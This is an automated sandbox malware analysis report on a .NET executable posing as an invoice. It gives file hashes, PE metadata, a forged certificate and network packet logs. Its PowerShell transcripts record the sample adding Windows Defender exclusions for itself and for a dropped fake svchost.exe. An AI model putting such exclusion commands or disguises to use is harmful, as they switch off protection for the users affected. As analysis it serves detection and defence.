                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5885
                                                                                                              Entropy (8bit):5.426114680347712
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZzjJNCqDo1Z8ZBjJNCqDo1ZEFHdjZejJNCqDo1ZiYttjZw:e
                                                                                                              MD5:794F27F33C57215E93933ABBD7D08078
                                                                                                              SHA1:EBCBD871DAE78BBEF57836C8E88B6FC8E5F6832C
                                                                                                              SHA-256:CF3BA8F7E0711BD501934E46A2CC4948B734AB0AEAC8D14E934026DF9C9F9239
                                                                                                              SHA-512:8C93F913D52347F045B7B817C7AF7F5D571548A50A1E7E0A8B9C7CD04F286BA135BE637A34D8CF8660D70A54629B6A835B2C6F8495315C74150D26C084498516
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151046..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe -Force..Process ID: 3400..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151046..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151413..Username: DESKTOP
                                                                                                              C:\Users\user\Documents\20210225\PowerShell_transcript.367706.M_cQjc0Y.20210225151010.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5869
                                                                                                              Entropy (8bit):5.381608150850337
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZcjJNfDqDo1Z44ZgjJNfDqDo1ZwLg9gzgjZDjJNfDqDo1ZlcgDgDgRZu:y
                                                                                                              MD5:5733AEE55EEC4C977793BA763910861B
                                                                                                              SHA1:655C9B8408D1AED016AB0839E38FD46C7EAEAE34
                                                                                                              SHA-256:A52FDE98308C1EB3306470F1E69566363B015D744404B731D4B5B9464F0C2827
                                                                                                              SHA-512:FDC520CEE5CFA132AFB8898074C6FBD92B500FFED012418F3D807DDE0744DC316F32FD6A50ED567FB1CE805272AF97607DE8F93A410D895C708FEB197F9277D5
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151023..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe -Force..Process ID: 1472..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151023..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151359..Username: computer
                                                                                                              C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):38008
                                                                                                              Entropy (8bit):5.377385288397735
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:aW5bfD3mDeQTC2DYUlllllll9lllllll4l28KhJpsFPh:aW1f7ceQTpYUlllllll9lllllll4l28X
                                                                                                              MD5:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              SHA1:320DEA63289CAD5685CFBA395D673142F85FC6FF
                                                                                                              SHA-256:6E67B342328C550BEAD9BF5A953ABBB12085AEDB4A7A625C242B5474E71A5DB8
                                                                                                              SHA-512:73D4C3830287C6E7B33DE1ED8A2A8DAA104FA90399600B7189B2499E4259436F684E0362215A8783A5E4093EFFDA313DA8748986FF9D272E59AA72AEBEDDE22D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 28%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`*A..........."...0..x.............. ........@.. ....................................@.....................................W.......................x............................................................ ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........3...b...........................................................*..(....*..(....*~s!........s"........s?........*BsZ...oY...o#...*.r.9.p(.....(....r.9.p(....s3...&*....0..........r...pr...p~....o....r...pr...p~....o....~....o....r...pr$..p~....o....r,..pr8..p~....o....~....o....~....o.....s......%r@..pr...p~....o....r...pr...p~....o....~....o....r...pr...p~....o....r...pr...p~....o....~....o....~....o....o....%r...pr&..p~....o....r...pr:..p~....o....~....o....rB..prV
                                                                                                              C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe:Zone.Identifier
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview: [ZoneTransfer]....ZoneId=0

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):5.377385288397735
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File size:38008
                                                                                                              MD5:a0f103f98ede4da72e178ee05dabe1e1
                                                                                                              SHA1:320dea63289cad5685cfba395d673142f85fc6ff
                                                                                                              SHA256:6e67b342328c550bead9bf5a953abbb12085aedb4a7a625c242b5474e71a5db8
                                                                                                              SHA512:73d4c3830287c6e7b33de1ed8a2a8daa104fa90399600b7189b2499e4259436f684e0362215a8783a5e4093effda313da8748986ff9d272e59aa72aebedde22d
                                                                                                              SSDEEP:768:aW5bfD3mDeQTC2DYUlllllll9lllllll4l28KhJpsFPh:aW1f7ceQTpYUlllllll9lllllll4l28X
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`*A..........."...0..x............... ........@.. ....................................@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4096ee
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Authenticode Signature

                                                                                                              Signature Valid:false
                                                                                                              Signature Issuer:C=RhsegNsnuaMnFSzJSHbIMUy, S=TKbvMpnoPECEDjKPKWAtEZlmGBoanUWBiq, L=SuAScGBkEoSjbkzCECcq, T=NJNtgcwcBCTwFxamfGPkUCjlPDafjQAyKqkMxBelHK, E=vlUlodNtWupIeCwKVItV, OU=IDJQtxsheIbYaBRvwyZSeoHWgFemeHGAvgelX, O=vivVuRAzZUKNM, CN=HAkjSMPHlEsE
                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                              Error Number:-2146762487
                                                                                                              Not Before, Not After
                                                                                                              • 2/24/2021 8:31:21 PM 2/24/2022 8:31:21 PM
                                                                                                              Subject Chain
                                                                                                              • C=RhsegNsnuaMnFSzJSHbIMUy, S=TKbvMpnoPECEDjKPKWAtEZlmGBoanUWBiq, L=SuAScGBkEoSjbkzCECcq, T=NJNtgcwcBCTwFxamfGPkUCjlPDafjQAyKqkMxBelHK, E=vlUlodNtWupIeCwKVItV, OU=IDJQtxsheIbYaBRvwyZSeoHWgFemeHGAvgelX, O=vivVuRAzZUKNM, CN=HAkjSMPHlEsE
                                                                                                              Version:3
                                                                                                              Thumbprint MD5:EF28D8EF5540C2DDF8982021C060330B
                                                                                                              Thumbprint SHA-1:3FB51DB8532A75A759CC58FCAC48F75BC950A343
                                                                                                              Thumbprint SHA-256:ED4807C63650641F009FDC3D82D1A3A58C8D6EEA22E655FD1970962F803188EB
                                                                                                              Serial:5FF50A8B939E7010528F8FA57C8DC691

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x96940x57.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x3e0.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x80000x1478.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000x76f40x7800False0.374055989583data4.93746742515IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xa0000x3e00x400False0.46875data3.52295456663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xc0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_VERSION0xa0580x388dataEnglishUnited States

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Version Infos

                                                                                                              DescriptionData
                                                                                                              LegalCopyrightCopyright 2022 MElPBjWh. All rights reserved.
                                                                                                              Assembly Version0.0.5.0
                                                                                                              InternalNameNbTfoyms.exe
                                                                                                              FileVersion7.5.8.1
                                                                                                              CompanyNameKlNrqpbB
                                                                                                              LegalTrademarksZAYgcLMa
                                                                                                              CommentsSArWMDgi
                                                                                                              ProductNameNbTfoyms
                                                                                                              ProductVersion0.0.5.0
                                                                                                              FileDescriptionGFZIgBqf
                                                                                                              OriginalFilenameNbTfoyms.exe
                                                                                                              Translation0x0409 0x0514

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Feb 25, 2021 15:09:59.456415892 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.511552095 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.511753082 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.512818098 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.566689968 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651695013 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651731014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651753902 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651779890 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651803017 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651824951 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651850939 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.651873112 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651896000 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651917934 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651931047 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.651952028 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651962042 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.652018070 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.653065920 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.653103113 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.653218985 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.654400110 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.654433012 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.654535055 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.655621052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.655654907 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.655783892 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.656821966 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.656857014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.656929016 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.658185959 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.658222914 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.658297062 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.659379005 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.659414053 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.659490108 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.660640001 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.660674095 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.660744905 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.661930084 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.661959887 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.662056923 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.663156986 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.663189888 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.663286924 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.664402962 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.664441109 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.664530993 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.704585075 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.704626083 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.704747915 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.705084085 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.705111980 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.705363035 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.706449986 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.706486940 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.706554890 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.707669973 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.707705021 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.707782984 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.708934069 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.708967924 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.709079027 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.710192919 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.710793972 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.710825920 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.710899115 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.712039948 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.712075949 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.712130070 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.713319063 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.713355064 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.713485956 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.714581013 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.714620113 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.714740992 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.715842009 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.715878010 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.716008902 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.717123032 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.717159986 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.717263937 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.718394995 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.718430996 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.718488932 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.719669104 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.719707966 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.719785929 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.720860004 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.720889091 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.720943928 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.722151995 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.722183943 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.722249031 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.723439932 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.723478079 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.723529100 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.724689960 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.724781990 CET4972280192.168.2.4172.67.172.17

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Feb 25, 2021 15:09:50.541249990 CET5992053192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:50.595599890 CET53599208.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:51.337537050 CET5745853192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:51.397670031 CET53574588.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:52.336178064 CET5057953192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:52.384700060 CET53505798.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:53.281183958 CET5170353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:53.334585905 CET53517038.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:54.745199919 CET6524853192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:54.795551062 CET53652488.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:58.368985891 CET5372353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:59.361884117 CET5372353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:59.421478033 CET53537238.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:23.339471102 CET6464653192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:23.388288021 CET53646468.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:24.923059940 CET6529853192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:24.971760988 CET53652988.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:25.973829985 CET5912353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:26.025499105 CET53591238.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:26.946722984 CET5453153192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:26.998404980 CET53545318.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.087435007 CET4971453192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:28.136029005 CET53497148.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.233695984 CET5802853192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:28.292831898 CET53580288.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:32.579303026 CET5309753192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:33.779674053 CET5309753192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:34.786875010 CET5309753192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:34.837687016 CET53530978.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:40.718133926 CET4925753192.168.2.48.8.8.8
